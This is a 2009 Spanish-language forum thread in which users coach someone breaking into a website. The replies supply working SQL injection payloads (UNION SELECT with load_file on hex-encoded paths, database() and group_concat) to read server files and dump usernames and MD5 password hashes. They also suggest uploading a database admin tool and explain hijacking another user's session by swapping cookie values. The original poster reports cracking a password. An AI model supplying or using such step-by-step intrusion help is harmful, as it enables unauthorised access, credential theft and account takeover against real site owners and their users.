Título: Ayuda Mmm... Publicado por: Wifox en 7 Julio 2009, 01:11 am Estaba intenta ingresar una web solo por el afan de aprender xD
Me ayude con un video de youtube... Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(... me manda lo siguiente Código: // Carga el archivo de definiciones se que la tabla de usuario es usuario xd pero la password nose entonces si me pudieran ayudar xd Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/* Título: Re: Ayuda Mmm... Publicado por: Azielito en 7 Julio 2009, 19:01 pm Ya tienes como cargar archivos, carga ahora "_conexion.php"
Código: 433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f5f636f6e6578696f6e2e706870 Para ver usuario y contraseña de la base de datos, y luego intenta conectarte a la base de datos via remoto, si no se puede intenta subir el phpminiadmin para entrar a la base de datos '_' Título: Re: Ayuda Mmm... Publicado por: WHK en 7 Julio 2009, 19:42 pm union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con union select 1,2,3,4,database(),6,7,8,9,0 /* Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user Título: Re: Ayuda Mmm... Publicado por: 08l00D en 7 Julio 2009, 20:04 pm Citar se que la tabla de usuario es usuario xd pero la password nose La tabla de usuarios es usuarios no usuario.. usuario es el nombre de la columna igual que clave...WHK ya te dio la inyeccion completa asi que lo unico te toca sacar el username y la password en md5... solo una cosa si tienes varios usuarios admin, y quieres ir viendo todos en ves de limit podes usar group_concat(usuario,0x3a,clave) ... Saludos.. Título: Re: Ayuda Mmm... Publicado por: Wifox en 9 Julio 2009, 02:49 am union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /* ;D see me resulto pero hay un problema, creo que me manda la clave md5 :-\donde basededatos es el nombre de la base de datos que sacas con union select 1,2,3,4,database(),6,7,8,9,0 /* Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user a95238df9190e26ce56f7f95bc51d229 el usuario no tiene problemas, no saben de un crack de md5? Título: Re: Ayuda Mmm... Publicado por: Wifox en 9 Julio 2009, 03:44 am vengo denuevo xd
la password era "holitas" pero cunado la probe me decia usuario desactivado :¬¬ entonces no se puede? :huh: Título: Re: Ayuda Mmm... Publicado por: WHK en 9 Julio 2009, 09:41 am entra como un usuario normal y cheka tus cookies, reemplaza tu pass normal por el pass del otro usuario, no necesitas crackear nada..
por ejemplo si tu cookie es: id:1:pass:hgfdf5465df465df4g86f entonces sacas los datos de la otra persona y reemplazas tus datos por los de el y ya, refrescas el navegador y ya tomaste poder de su sesión. |